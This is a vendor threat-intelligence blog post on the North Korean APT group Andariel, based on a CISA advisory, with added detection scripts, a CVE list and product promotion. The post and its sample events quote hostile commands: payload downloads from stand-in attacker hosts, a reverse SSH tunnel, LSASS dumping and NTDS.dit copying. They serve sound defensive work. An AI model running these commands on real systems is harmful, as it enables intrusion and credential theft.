On July 25, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on the state-sponsored North Korean APT group Andariel [1]. Andariel, also known as Onyx Sleet, is associated with the 3rd Bureau of North Korea's Reconnaissance General Bureau (RGB). The group previously conducted destructive attacks but has since shifted to specialized cyber espionage and ransomware operations.
In this blog post, we explain the tools and techniques used by Andariel and how organizations can defend themselves against this North Korean APT group.
Andariel, also known as Onyx Sleet, is an Advanced Persistent Threat (APT) that has been associated with North Korea's Reconnaissance General Bureau (RGB) based in Pyongyang and Sinuiju. Andariel has been active since 2013, and the group gained infamy with the Sony Pictures hack in 2014.
Andariel's motivations are aligned with the North Korean political agenda and the APT group primarily targets defense, aerospace, nuclear, and engineering organizations for cyber espionage. Additionally, they run ransomware operations against healthcare organizations in the US to fund their operations.
The North Korean APT group uses a range of tactics, including spear phishing and exploitation of vulnerabilities in public-facing web servers, to infiltrate targeted organizations. After gaining an initial foothold, the actors run well-known system discovery and enumeration techniques and establish persistence by deploying web shells and scheduled tasks. They also use custom malware, remote access tools (RATs), and open-source tools for lateral movement and data exfiltration.
Andariel exploits known, critical vulnerabilities to gain initial access to target networks. Although patches for these vulnerabilities were released long ago, unpatched assets still pose a significant risk to organizations. The list of exploited vulnerabilities is given in the Appendix.
Adversaries abuse native tools and processes such as the Windows command line (cmd.exe), PowerShell, and WMI on compromised systems to carry out their actions without raising suspicion. This technique is known as Living-off-the-Land (LotL). Some of the commands observed in the advisory are given below (bracketed values are placeholders, and URLs are defanged):

netstat -naop
systeminfo | findstr Logon
pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>
curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The first two commands list listening ports and the host's logon server (the domain controller). The pvhost.exe invocation uses PLINK's command-line flags (-N for no shell, -R for a reverse port forward, -l and -pw for credentials), consistent with a renamed PLINK binary opening a reverse tunnel to the actors' server. The curl command downloads a payload into the world-writable C:\Users\Public folder.
The North Korean threat actors pack their malicious tools with VMProtect and Themida. The resulting files often contain PE section names such as vmp0 and vmp1. This obfuscation makes static detection, analysis, and debugging harder for security teams.
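The following script, added here as an example and not code from Picus, the advisory, or the threat actors, shows how to surface that packing indicator from a PE file's section table without any third-party library. The vmp0/vmp1 names come from the text above; the dotted variants .vmp0/.vmp1, the .themida name, and the 7.2 bits/byte entropy threshold are assumptions added as common packer indicators. The two sample PE images are constructed in the script so it runs offline; point it at a real file with `python pe_packer_check.py sample.exe`.

```python
"""Flag PE files whose section table looks like VMProtect/Themida output.

Added example, not code from Picus or the CISA advisory. The section names
vmp0 and vmp1 come from the advisory; the dotted variants .vmp0/.vmp1, the
.themida name and the 7.2-bit entropy threshold are assumptions added here
as common packer indicators. Standard library only, so it runs offline.
"""
import math
import struct
import sys

PACKER_SECTION_NAMES = {b"vmp0", b"vmp1", b".vmp0", b".vmp1", b".themida"}
ENTROPY_THRESHOLD = 7.2  # assumption: bits/byte above which a section looks packed/encrypted


def shannon_entropy(buf: bytes) -> float:
    """Entropy in bits per byte; 8.0 means uniformly random, 0.0 means constant."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(data: bytes) -> list:
    """Parse the PE section table into [{name, raw_size, entropy}, ...]."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER follows "PE\0\0"
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size               # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + i * 40)
        body = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0"), "raw_size": raw_size,
                         "entropy": shannon_entropy(body)})
    return sections


def packer_indicators(data: bytes) -> list:
    """Human-readable findings; an empty list means no packer indicator was seen."""
    findings = []
    for s in pe_sections(data):
        label = s["name"].decode("ascii", errors="replace")
        if s["name"].lower() in PACKER_SECTION_NAMES:
            findings.append(f"packer section name: {label}")
        if s["raw_size"] >= 256 and s["entropy"] >= ENTROPY_THRESHOLD:
            findings.append(f"high entropy {s['entropy']:.2f} bits/byte in section {label}")
    return findings


def build_pe(sections: list) -> bytes:
    """Build a minimal, non-runnable PE image from (name, body) pairs: test input only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)       # exactly 0x40 bytes
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0x22)  # SizeOfOptionalHeader = 0
    raw_ptr = e_lfanew + 4 + len(coff) + 40 * len(sections)
    table, bodies = b"", b""
    for name, body in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(body), 0x1000,
                             len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += body
        raw_ptr += len(body)
    return dos + b"PE\0\0" + coff + table + bodies


# Constructed samples: a plain binary and one with VMProtect-style sections.
CLEAN_SAMPLE = build_pe([(b".text", b"\x90" * 1024 + b"\xc3"), (b".data", b"hello world\0" * 32)])
PACKED_SAMPLE = build_pe([(b"vmp0", b""), (b"vmp1", bytes(range(256)) * 16)])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else PACKED_SAMPLE
    for s in pe_sections(data):
        print(f"{s['name'].decode('ascii', 'replace'):10} raw={s['raw_size']:8d} entropy={s['entropy']:.2f}")
    print("\n".join(packer_indicators(data)) or "no packer indicators")
```

The name check is cheap but trivially evaded by renaming sections, which is why the script also reports high-entropy sections: a VMProtect or Themida layer leaves the original code encrypted, so the section carrying it scores close to 8 bits/byte regardless of what it is called. Treat either finding as a reason to detonate or unpack the sample rather than as proof of malice, since commercial software is packed with the same products.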
Andariel uses publicly available tools such as Mimikatz, ProcDump, and Dumpert to dump credentials from LSASS memory and from the Active Directory domain database (NTDS.dit). After dumping the credential material, the actors crack it offline to obtain clear-text passwords for valid accounts.
The actors use AdFind, a command-line Active Directory query tool, to enumerate the domain. It gives them a list of valid accounts, usernames, and email addresses within the compromised network.
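The script below, added here as an example and not code from Picus or the advisory, triages Windows process-creation events for the command shapes described in the three sections above: the LotL commands (PLINK-style reverse tunnel, curl download into C:\Users\Public, systeminfo piped to findstr), LSASS and NTDS.dit credential dumping, and AdFind enumeration. The event format (one record per process creation with host, user, image, and command line, as a SIEM would forward from Sysmon Event ID 1 or Security Event 4688) and every sample event are constructed; host names, user names, file names, and the 203.0.113.x addresses are made up.

```python
"""Triage process-creation events for Andariel-style LotL and credential-access commands.

Added example, not code from Picus or the CISA advisory. The event format and
all SAMPLE_EVENTS are constructed for this demo; hosts, users, paths and the
203.0.113.0/24 addresses (a documentation range) are made up.
"""
import re

# Each rule keys on the *shape* of the command line, not on the binary name:
# the advisory shows PLINK renamed to pvhost.exe, and a renamed ProcDump still
# needs "-ma lsass" to dump LSASS.
RULES = [
    ("reverse tunnel with embedded password (plink -R ... -pw)",
     re.compile(r"\s-R\s+\S+:\d+.*\s-pw\s", re.I)),
    ("curl download into C:\\Users\\Public",
     re.compile(r"\bcurl(\.exe)?\b.*\s-o\s+\S*\\users\\public\\", re.I)),
    ("systeminfo piped to findstr (host discovery)",
     re.compile(r"\bsysteminfo\b.*\|\s*findstr\b", re.I)),
    ("full memory dump of lsass (-ma lsass)",
     re.compile(r"\s-ma\s+lsass(\.exe)?\b", re.I)),
    ("access to NTDS.dit (domain credential database)",
     re.compile(r"ntds\.dit", re.I)),
    ("AdFind Active Directory enumeration",
     re.compile(r"\badfind(\.exe)?\b|\(objectcategory=", re.I)),
]

# Constructed sample events. The first and last are benign-looking on purpose.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\NETSTAT.EXE",
     "cmdline": "netstat -naop tcp"},
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c systeminfo | findstr Logon"},
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Users\Public\pvhost.exe",
     "cmdline": "pvhost.exe -N -R 203.0.113.10:8443 -P 22 -l tunnel -pw Pa55w0rd 203.0.113.10"},
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl http://203.0.113.10/tmp/tmp/comp.dat -o c:\users\public\notify.exe"},
    {"host": "DC01", "user": r"CORP\svc_backup", "image": r"C:\Temp\pd.exe",
     "cmdline": r"pd.exe -accepteula -ma lsass.exe C:\Temp\ls.dmp"},
    {"host": "DC01", "user": r"CORP\svc_backup", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\n.dit"},
    {"host": "WS02", "user": r"CORP\mlee", "image": r"C:\Temp\adfind.exe",
     "cmdline": r"adfind.exe -f (objectcategory=person) -csv"},
    {"host": "WS02", "user": r"CORP\mlee", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl https://updates.example.com/agent.msi -o C:\Users\mlee\Downloads\agent.msi"},
]


def triage(events):
    """Return one alert per event that matches at least one rule."""
    alerts = []
    for ev in events:
        hits = [name for name, rx in RULES if rx.search(ev["cmdline"])]
        if hits:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "image": ev["image"], "rules": hits})
    return alerts


def hosts_with_chain(alerts, min_rules=2):
    """Hosts on which at least `min_rules` distinct rules fired. One LotL command
    is weak evidence; several different ones on the same host look like an intrusion."""
    per_host = {}
    for a in alerts:
        per_host.setdefault(a["host"], set()).update(a["rules"])
    return {h for h, rules in per_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['host']:5} {a['user']:16} {a['image']}\n      -> {', '.join(a['rules'])}")
    print("escalate:", sorted(hosts_with_chain(found)))
```

Note what does not fire: `netstat -naop tcp` on its own and a curl download into the user's own Downloads folder are too common to alert on, so the rules are deliberately narrow, and the escalation step (`hosts_with_chain`) is what turns individually weak LotL hits into a case worth a responder's time.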
The threat actors use a custom .NET tool to enumerate files and directories on compromised hosts. For each targeted drive it records the starting path, file name, last write time, last access time, creation time, size, and attributes.
Adversaries use remote services such as Telnet, SSH, VNC, RDP, and SMB to interact with remote systems. Compromised valid accounts also allow them to move laterally within the compromised network.
Adversaries use the HTTP protocol to blend their C2 activity with the usual network traffic. This technique allows them to appear as benign traffic and evade detection by security controls.
Andariel uses tools like 3Proxy, PLINK, and Stunnel to tunnel their traffic over various protocols from compromised hosts to C2 servers.
Instead of directly communicating with their C2 servers, threat actors use web services and cloud storage services to exfiltrate data from compromised networks.
Andariel uses PuTTY and WinSCP to exfiltrate data to its servers via the File Transfer Protocol (FTP).
We also strongly suggest simulating Andariel attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.
The Picus Threat Library includes the following threats for Andariel (aka Onyx Sleet):

| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 38883 | Andariel Threat Group Campaign 2023 | Windows Endpoint |
| 56407 | Andariel Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration |
| 41382 | Andariel Threat Group Campaign Backdoor Malware Email Threat | Email Infiltration (Phishing) |
| 76699 | Andariel Threat Group Campaign Malware Downloader Download Threat | Network Infiltration |
| 88521 | Andariel Threat Group Campaign Ransomware Download Threat | Network Infiltration |
| 38855 | Andariel Threat Group Campaign Ransomware Email Threat | Email Infiltration (Phishing) |
| 93568 | Andariel Threat Group Campaign Malware Downloader Email Threat | Email Infiltration (Phishing) |
| 37270 | Andariel Threat Group Campaign RAT Download Threat | Network Infiltration |
| 30592 | Andariel Threat Group Campaign RAT Email Threat | Email Infiltration (Phishing) |
| 76162 | Lilith RAT Download Threat | Network Infiltration |
| 36694 | Lilith RAT Email Threat | Email Infiltration (Phishing) |
| 47956 | Yamabot RAT Download Threat | Network Infiltration |
| 23158 | Yamabot RAT Email Threat | Email Infiltration (Phishing) |
| 33583 | Atharvan Backdoor Malware Download Threat | Network Infiltration |
| 24167 | Atharvan Backdoor Malware Email Threat | Email Infiltration (Phishing) |
| 38967 | TigerRAT RAT Download Threat | Network Infiltration |
| 77704 | TigerRAT RAT Email Threat | Email Infiltration (Phishing) |
Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures for the malware and vulnerabilities used by the Andariel (Onyx Sleet) group, for deployment in preventive security controls. Picus Labs has validated the following signatures for the Andariel APT group:
| Security Control | Signature ID | Signature Name |
|---|---|---|
| Check Point | 0DA0DE0F0 | TS_APT.Win32.Lazarus.TC.2b7bkEkG |
| Check Point | 0C6CB1FF8 | Trojan.Win32.Ransomware.Win32.Custom.TC.4999V |
| Check Point | 09A3A83C9 | Backdoor.Win32.Andariel.TC.f79eWHdC |
| Check Point | 0AE871AFF | Backdoor.Win32.Andariel.TC.f7f0Gdlj |
| Check Point | 08974D9A1 | TS_APT.Win32.Lazarus.TC.739efHbg |
| Check Point | 0FCD3CDFF | Trojan.Win32.Generic.Win32.Generic.TC.f14dLxvv |
| Check Point | 0F54522EE | Trojan.Win32.Generic.TC.89abRAvr |
| Check Point | 0896BA266 | Trojan.Win32.Imphash.TC.146bNnUc |
| Check Point | 0D53F5CE5 | Ransomware.Win32.HelloKitty.TC.2febTLgq |
| Check Point | 0DDEDEB11 | HEUR:Trojan.Win32.Mikey.TC.3c83rvQA |
| Check Point | 09A75653F | HEUR:Trojan.Win32.Mikey.TC.62aeGoGy |
| Check Point | 09378C88A | Trojan.Win32.Imphash.TC.1bd6Kdgd |
| Check Point | 0B17077B7 | Backdoor.Win32.TigerRat.TC.3ac2gJvN |
| Cisco Firepower | W32.79E15CC02C-95.SBX.TG | |
| Cisco Firepower | W32.5C2F339362.in12.Talos | |
| Cisco Firepower | W32.Auto:1177105e51.in03.Talos | |
| Cisco Firepower | W32.Auto:b59e8f4482.in03.Talos | |
| Cisco Firepower | GenericKD:TROJ_GEN-tpd | |
| Cisco Firepower | TROJ_GEN:TrojanX-tpd | |
| Cisco Firepower | W32.Auto:8daa6b.in03.Talos | |
| Cisco Firepower | W32.Auto:3098e6.in03.Talos | |
| Cisco Firepower | W32.Auto:ce534eb8de.in03.Talos | |
| Cisco Firepower | W32.Auto:c3c0cf.in03.Talos | |
| Cisco Firepower | W32.Auto:8b3c8046fa.in03.Talos | |
| Cisco Firepower | W32.FEC82F2542.in12.Talos | |
| Cisco Firepower | W32.Auto:4aadf76749.in03.Talos | |
| Cisco Firepower | W32.868A62FEFF-100.SBX.VIOC | |
| Cisco Firepower | W32.C2500A6E12.in12.Talos | |
| Cisco Firepower | W32.9F90670D21.in12.Talos | |
| Forcepoint NGFW | File_Malware-Blocked | |
| Forcepoint NGFW | File-OLE_Malicious-Looking-Document | |
| FortiGate AV | 62183 | PossibleThreat |
| FortiGate AV | 6945573 | Adware/HiddenInstall |
| FortiGate AV | 8173658 | PossibleThreat.MU |
| FortiGate AV | 10021613 | W64/NukeSped.HD!tr |
| FortiGate AV | 10125033 | MSIL/Agent_AGen.AOS!tr |
| FortiGate AV | 10003277 | VBA/Agent.UOE!tr |
| FortiGate AV | 8187637 | W32/AI.Pallas.Suspicious |
| FortiGate AV | 10036457 | W32/Filecoder.OHM!tr |
| Palo Alto | 459572261 | trojan/Win32 EXE.xnet.ae |
| Palo Alto | 413328855 | trojan/Win32 EXE.malware.axun |
| Palo Alto | 618815202 | trojan/Win32.tigerrat.c |
| Palo Alto | 602811585 | trojan/Win32.susgen.apt |
| Palo Alto | 459168833 | trojan/Win32 EXE.xnet.ad |
| Palo Alto | 459572168 | trojan/Win32.nukesped.l |
| Palo Alto | 413338881 | trojan/Win32 EXE.artemis.aixp |
| Palo Alto | 615485823 | trojan/Win32.heur2.en |
| Palo Alto | 413245182 | trojan/MS WORD.valyria.ono |
| Palo Alto | 408136170 | trojan/Win32 EXE.siggen.aat |
| Palo Alto | 459168818 | Program/Win32.multiverze.a |
| Palo Alto | 408041781 | trojan/Win32 EXE.siggen.xl |
| Palo Alto | 413246292 | trojan/Win32 EXE.hiddeninstall.dq |
| Palo Alto | 601781334 | trojan/Win32.andardoor.b |
| Palo Alto | 580706583 | Trojan/Win32.tiggre.vcj |
| Snort | 3.13469.13 | FILE-OFFICE Microsoft Word ole stream memory corruption attempt |
| Snort | 1.2019837.2 | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
| Trellix | 0x4840c900 | MALWARE: Malicious File Detected by GTI |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
[1] "North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a
The list below shows known and critical vulnerabilities exploited by Andariel. Using the Picus Security Validation Platform, you can validate your security controls against Andariel's vulnerability exploitation attacks.
| Product | Vulnerability | CVSS Score |
|---|---|---|
| Apache ActiveMQ | CVE-2023-46604 | 9.8 (Critical) |
| JetBrains TeamCity | CVE-2023-42793 | 9.8 (Critical) |
| Citrix NetScaler | CVE-2023-3519 | 9.8 (Critical) |
| Ivanti Endpoint Manager Mobile (EPMM) | CVE-2023-35078 | 9.8 (Critical) |
| Progress MOVEit Transfer | CVE-2023-34362 | 9.8 (Critical) |
| Apache RocketMQ | CVE-2023-33246 | 9.8 (Critical) |
| KeePass | CVE-2023-32784 | 7.5 (High) |
| Openfire | CVE-2023-32315 | 7.5 (High) |
| Google Chromium V8 (type confusion) | CVE-2023-3079 | 9.8 (Critical) |
| Zyxel ZyWALL/USG series firmware | CVE-2023-28771 | 9.8 (Critical) |
| Zyxel ATP series firmware | CVE-2023-33010 | 9.8 (Critical) |
| Barracuda Email Security Gateway | CVE-2023-2868 | 9.8 (Critical) |
| FortiGate SSL VPN | CVE-2023-27997 | 9.8 (Critical) |
| Apache HTTP Server | CVE-2023-25690 | 9.8 (Critical) |
| Oracle Hospitality Opera 5 | CVE-2023-21932 | 7.2 (High) |
| GoAnywhere MFT | CVE-2023-0669 | 7.2 (High) |
| Zoho ManageEngine | CVE-2022-47966 | 9.8 (Critical) |
| Zimbra Collaboration Suite | CVE-2022-41352 | 9.8 (Critical) |
| Zimbra Collaboration Suite | CVE-2022-27925 | 7.2 (High) |
| Microsoft Windows Support Diagnostic Tool (MSDT) | CVE-2022-30190 | 7.8 (High) |
| TP-Link TL-WR840N | CVE-2022-25064 | 9.8 (Critical) |
| TerraMaster NAS | CVE-2022-24990 | 7.5 (High) |
| TerraMaster NAS | CVE-2021-45837 | 9.8 (Critical) |
| Moment.js library | CVE-2022-24785 | 7.5 (High) |
| PHP Everywhere | CVE-2022-24665 | 8.8 (High) |
| PHP Everywhere | CVE-2022-24664 | 8.8 (High) |
| PHP Everywhere | CVE-2022-24663 | 8.8 (High) |
| Spring MVC and WebFlux (Spring4Shell) | CVE-2022-22965 | 9.8 (Critical) |
| Spring Cloud Gateway | CVE-2022-22947 | 10.0 (Critical) |
| Microsoft SharePoint Server | CVE-2022-22005 | 8.8 (High) |
| Microsoft Windows Win32k (elevation of privilege) | CVE-2022-21882 | 7.8 (High) |
| Apache Log4j (Log4Shell) | CVE-2021-44228 | 10.0 (Critical) |
| Samba vfs_fruit module | CVE-2021-44142 | 9.9 (Critical) |
| Windows Common Log File System Driver | CVE-2021-43226 | 7.8 (High) |
| Windows Common Log File System Driver | CVE-2021-43207 | 7.8 (High) |
| Windows Common Log File System Driver | CVE-2021-36955 | 7.8 (High) |
| Apache HTTP Server 2.4.49 | CVE-2021-41773 | 7.5 (High) |
| Talend ESB Runtime | CVE-2021-40684 | 9.1 (Critical) |
| IPeakCMS 3.5 | CVE-2021-3018 | 9.8 (Critical) |
| SonicWall SMA100 (Apache httpd server) | CVE-2021-20038 | 9.8 (Critical) |
| SonicWall Secure Remote Access (SRA) | CVE-2021-20028 | 9.8 (Critical) |
| Tableau Server, Desktop, and Public Desktop | CVE-2019-15637 | 8.1 (High) |
| Kibana | CVE-2019-7609 | 10.0 (Critical) |
| Microsoft Remote Desktop Services (BlueKeep) | CVE-2019-0708 | 9.8 (Critical) |
| VMware V4H and V4PA | CVE-2017-4946 | 7.8 (High) |